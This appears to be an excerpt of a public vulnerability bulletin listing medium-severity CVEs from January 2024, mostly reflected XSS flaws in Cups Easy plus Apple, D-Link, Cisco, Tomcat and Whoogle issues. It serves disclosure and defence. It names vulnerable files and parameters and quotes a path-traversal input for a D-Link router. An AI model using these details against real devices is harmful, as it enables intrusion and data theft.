BORGChat — borgchat | A vulnerability, which was classified as problematic, was found in BORGChat 1.0.0 Build 438. This affects an unknown part of the component Service Port 7551. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252039. | 2024-01-25 | 5.3 | CVE-2024-0888 [email protected] [email protected] [email protected] |
actidata — actinas_sl_2u-8_rdx_firmware | Multiple reflected cross-site scripting (XSS) vulnerabilities in nasSvr.php in actidata actiNAS-SL-2U-8 3.2.03-SP1 allow remote attackers to inject arbitrary web script or HTML. | 2024-01-19 | 6.1 | CVE-2023-51946 [email protected] [email protected] [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxcodemodify.php, in multiple parameters. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-25 | 6.1 | CVE-2024-23855 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/itemlist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23856 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grnlinecreate.php, in the batchno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23857 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stockissuancelinecreate.php, in the batchno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23858 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxstructurelinecreate.php, in the flatamount parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23859 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/currencylist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23860 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/unitofmeasurementcreate.php, in the unitofmeasurementid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23861 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grndisplay.php, in the grnno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23862 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxstructuredisplay.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23863 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/countrylist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23864 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxstructurelist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23865 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/countrycreate.php, in the countryid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23866 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/statecreate.php, in the stateid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23867 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grnlist.php, in the deleted parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23868 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stockissuanceprint.php, in the issuanceno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23869 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stockissuancelist.php, in the delete parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23870 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/unitofmeasurementmodify.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23871 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/locationmodify.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23872 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/currencymodify.php, in the currencyid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23873 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/companymodify.php, in the address1 parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23874 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stockissuancedisplay.php, in the issuanceno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23875 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxstructurecreate.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23876 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/currencycreate.php, in the currencyid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23877 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grnprint.php, in the grnno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23878 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/statemodify.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23879 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxcodelist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23880 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/statelist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23881 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxcodecreate.php, in the taxcodeid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23882 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxstructuremodify.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23883 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grnmodify.php, in the grndate parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23884 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/countrymodify.php, in the countryid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23885 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/itemmodify.php, in the bincardinfo parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23886 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grncreate.php, in the grndate parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23887 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stocktransactionslist.php, in the itemidy parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23888 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/itemgroupcreate.php, in the itemgroupid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23889 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/itempopup.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23890 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/itemcreate.php, in the itemid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23891 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/costcentercreate.php, in the costcenterid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23892 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/costcentermodify.php, in the costcenterid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23893 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stockissuancecreate.php, in the issuancedate parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23894 [email protected] |
ajaysharma — cups_easy | A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stock.php, in the batchno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. | 2024-01-26 | 6.1 | CVE-2024-23896 [email protected] |
amazon — aws_encryption_sdk | AWS Encryption SDK for Java versions 2.0.0 to 2.2.0 and less than 1.9.0 incorrectly validates some invalid ECDSA signatures. | 2024-01-19 | 5.3 | CVE-2024-23680 [email protected] [email protected] [email protected] |
any-capture — any_sound_recorder | A vulnerability was found in Any-Capture Any Sound Recorder 2.93. It has been declared as problematic. This vulnerability affects unknown code of the component Registration Handler. The manipulation of the argument User Name/Key Code leads to memory corruption. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. VDB-251674 is the identifier assigned to this vulnerability. | 2024-01-22 | 5.3 | CVE-2024-0774 [email protected] [email protected] [email protected] |
apache — tomcat | Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat.This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43. Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue. | 2024-01-19 | 5.3 | CVE-2024-21733 [email protected] [email protected] |
apple — ipados | An access issue was addressed with improved access restrictions. This issue is fixed in watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3. A maliciously crafted webpage may be able to fingerprint the user. | 2024-01-23 | 6.5 | CVE-2024-23206 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] |
apple — ipados | A privacy issue was addressed with improved handling of files. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to access sensitive user data. | 2024-01-23 | 6.2 | CVE-2024-23223 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] |
apple — ipados | This issue was addressed by removing the vulnerable code. This issue is fixed in tvOS 17, watchOS 10, macOS Sonoma 14, iOS 17 and iPadOS 17, macOS Ventura 13.6.4. An app may be able to bypass Privacy preferences. | 2024-01-23 | 5.5 | CVE-2023-40528 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] |
apple — ipados | The issue was addressed with improved checks. This issue is fixed in iOS 16.7.5 and iPadOS 16.7.5, watchOS 10.2, macOS Ventura 13.6.4, macOS Sonoma 14.2, macOS Monterey 12.7.3, iOS 17.2 and iPadOS 17.2. Processing a maliciously crafted image may result in disclosure of process memory. | 2024-01-23 | 5.5 | CVE-2023-42888 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] |
apple — ipados | This issue was addressed with improved redaction of sensitive information. This issue is fixed in watchOS 10.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, macOS Ventura 13.6.4, macOS Monterey 12.7.3. An app may be able to access sensitive user data. | 2024-01-23 | 5.5 | CVE-2024-23207 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] |
apple — macos | An access issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Ventura 13.6.4, macOS Sonoma 14.2. An app may be able to read arbitrary files. | 2024-01-23 | 6.3 | CVE-2023-42887 [email protected] [email protected] [email protected] [email protected] |
apple — macos | The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.3, macOS Ventura 13.6.4. An app may be able to access sensitive user data. | 2024-01-23 | 5.5 | CVE-2024-23224 [email protected] [email protected] [email protected] [email protected] |
autolab — eventprime | Autolab is a course management service that enables instructors to offer autograded programming assignments to their students over the Web. Path traversal vulnerabilities were discovered in Autolab’s assessment functionality in versions of Autolab prior to 2.12.0, whereby instructors can perform arbitrary file reads. Version 2.12.0 contains a patch. There are no feasible workarounds for this issue. | 2024-01-22 | 4.9 | CVE-2023-44395 [email protected] [email protected] [email protected] |
beijing_baichuo — smart_s210_management_platform | A vulnerability has been found in Beijing Baichuo Smart S210 Management Platform up to 20240117 and classified as critical. This vulnerability affects unknown code of the file /Tool/uploadfile.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252184. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 6.3 | CVE-2024-0939 [email protected] [email protected] [email protected] |
benbusby — whoogle_search | Whoogle Search is a self-hosted metasearch engine. In versions 0.8.3 and prior, the `element` method in `app/routes.py` does not validate the user-controlled `src_type` and `element_url` variables and passes them to the `send` method which sends a `GET` request on lines 339-343 in `requests.py`. The returned contents of the URL are then passed to and reflected back to the user in the `send_file` function on line 484, together with the user-controlled `src_type`, which allows the attacker to control the HTTP response content type leading to a cross-site scripting vulnerability. An attacker could craft a special URL to point to a malicious website and send the link to a victim. The fact that the link would contain a trusted domain (e.g. from one of public Whoogle instances) could be used to trick the user into clicking the link.The malicious website could, for example, be a copy of a real website, meant to steal a person’s credentials to the website, or trick that person in another way. Version 0.8.4 contains a patch for this issue. | 2024-01-23 | 6.1 | CVE-2024-22417 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] |
benbusby — whoogle_search | Whoogle Search is a self-hosted metasearch engine. Versions 0.8.3 and prior have a limited file write vulnerability when the configuration options in Whoogle are enabled. The `config` function in `app/routes.py` does not validate the user-controlled `name` variable on line 447 and `config_data` variable on line 437. The `name` variable is insecurely concatenated in `os.path.join`, leading to path manipulation. The POST data from the `config_data` variable is saved with `pickle.dump` which leads to a limited file write. However, the data that is saved is earlier transformed into a dictionary and the `url` key value pair is added before the file is saved on the system. All in all, the issue allows us to save and overwrite files on the system that the application has permissions to, with a dictionary containing arbitrary data and the `url` key value, which is a limited file write. Version 0.8.4 contains a patch for this issue. | 2024-01-23 | 5.3 | CVE-2024-22204 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] |
byzoro — smart_s150_firmware | A vulnerability classified as problematic has been found in Beijing Baichuo Smart S150 Management Platform V31R02B15. This affects an unknown part of the file /log/download.php of the component Backup File Handler. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-251541 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-19 | 5.3 | CVE-2024-0716 [email protected] [email protected] [email protected] |
canonical_ltd. — ubuntu_pipewire-pulse | Ubuntu’s pipewire-pulse in snap grants microphone access even when the snap interface for audio-record is not set. | 2024-01-24 | 5.5 | CVE-2022-4964 [email protected] [email protected] [email protected] [email protected] |
cisco — cisco_small_business_smart_and_managed_switches | A vulnerability with the access control list (ACL) management within a stacked switch configuration of Cisco Business 250 Series Smart Switches and Business 350 Series Managed Switches could allow an unauthenticated, remote attacker to bypass protection offered by a configured ACL on an affected device. This vulnerability is due to incorrect processing of ACLs on a stacked configuration when either the primary or backup switches experience a full stack reload or power cycle. An attacker could exploit this vulnerability by sending crafted traffic through an affected device. A successful exploit could allow the attacker to bypass configured ACLs, causing traffic to be dropped or forwarded in an unexpected manner. The attacker does not have control over the conditions that result in the device being in the vulnerable state. Note: In the vulnerable state, the ACL would be correctly applied on the primary devices but could be incorrectly applied to the backup devices. | 2024-01-26 | 5.8 | CVE-2024-20263 [email protected] |
cisco — cisco_unity_connection | A vulnerability in the web-based management interface of Cisco Unity Connection could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. | 2024-01-26 | 4.8 | CVE-2024-20305 [email protected] |
code-projects — social_networking_site | A vulnerability was found in code-projects Social Networking Site 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file message.php of the component Message Page. The manipulation of the argument Story leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251546 is the identifier assigned to this vulnerability. | 2024-01-19 | 5.4 | CVE-2024-0722 [email protected] [email protected] [email protected] |
consensys — discovery | Consensys Discovery versions less than 0.4.5 uses the same AES/GCM nonce for the entire session. which should ideally be unique for every message. The node’s private key isn’t compromised, only the session key generated for specific peer communication is exposed. | 2024-01-19 | 5.3 | CVE-2024-23688 [email protected] [email protected] [email protected] |
cozmoslabs — profile_builder_pro | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Cozmoslabs Profile Builder Pro. This issue affects Profile Builder Pro: from n/a through 3.10.0. | 2024-01-24 | 6.5 | CVE-2024-22141 [email protected] |
d-link — dir-816_a2 | A vulnerability has been found in D-Link DIR-816 A2 1.10CNB04 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /goform/setDeviceSettings of the component Web Interface. The manipulation of the argument statuscheckpppoeuser leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252139. | 2024-01-26 | 4.7 | CVE-2024-0921 [email protected] [email protected] [email protected] |
d-link– dir-859 1.06B01 | ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DIR-859 1.06B01. It has been rated as critical. Affected by this issue is some unknown functionality of the file /hedwig.cgi of the component HTTP POST Request Handler. The manipulation of the argument service with the input ../../../../htdocs/webinc/getcfg/DHCPS6.BRIDGE-1.xml leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251666 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced. | 2024-01-21 | 5.3 | CVE-2024-0769 [email protected] [email protected] [email protected] [email protected] |
dell — dell_pair | Dell Pair Installer version prior to 1.2.1 contains an elevation of privilege vulnerability. A low privilege user with local access to the system could potentially exploit this vulnerability to delete arbitrary files and result in Denial of Service. | 2024-01-24 | 6.6 | CVE-2023-44281 [email protected] |
dlink — dir-825acg1_firmware | A vulnerability classified as critical was found in D-Link DAP-1360, DIR-300, DIR-615, DIR-615GF, DIR-615S, DIR-615T, DIR-620, DIR-620S, DIR-806A, DIR-815, DIR-815AC, DIR-815S, DIR-816, DIR-820, DIR-822, DIR-825, DIR-825AC, DIR-825ACF, DIR-825ACG1, DIR-841, DIR-842, DIR-842S, DIR-843, DIR-853, DIR-878, DIR-882, DIR-1210, DIR-1260, DIR-2150, DIR-X1530, DIR-X1860, DSL-224, DSL-245GR, DSL-2640U, DSL-2750U, DSL-G2452GR, DVG-5402G, DVG-5402G, DVG-5402GFRU, DVG-N5402G, DVG-N5402G-IL, DWM-312W, DWM-321, DWR-921, DWR-953 and Good Line Router v2 up to 20240112. This vulnerability affects unknown code of the file /devinfo of the component HTTP GET Request Handler. The manipulation of the argument area with the input notice|net|version leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251542 is the identifier assigned to this vulnerability. | 2024-01-19 | 5.3 | CVE-2024-0717 [email protected] [email protected] [email protected] |
efs — easy_file_sharing_ftp_3.6 | A vulnerability classified as problematic has been found in EFS Easy File Sharing FTP 3.6. This affects an unknown part of the component Login. The manipulation of the argument password leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251559. | 2024-01-19 | 5.3 | CVE-2024-0736 [email protected] [email protected] [email protected] |
elijahharry — hoolock | hoolock is a suite of lightweight utilities designed to maintain a small footprint when bundled. Starting in version 2.0.0 and prior to version 2.2.1, utility functions related to object paths (`get`, `set`, and `update`) did not block attempts to access or alter object prototypes. Starting in version 2.2.1, the `get`, `set` and `update` functions throw a `TypeError` when a user attempts to access or alter inherited properties. | 2024-01-22 | 6.3 | CVE-2024-23339 [email protected] [email protected] |
european_chemicals_agency — IUCLID | A vulnerability, which was classified as critical, was found in European Chemicals Agency IUCLID 7.10.3 on Windows. Affected is an unknown function of the file iuclid6.exe of the component Desktop Installer. The manipulation leads to incorrect default permissions. The attack needs to be approached locally. VDB-251670 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-21 | 4.4 | CVE-2024-0770 [email protected] [email protected] [email protected] |
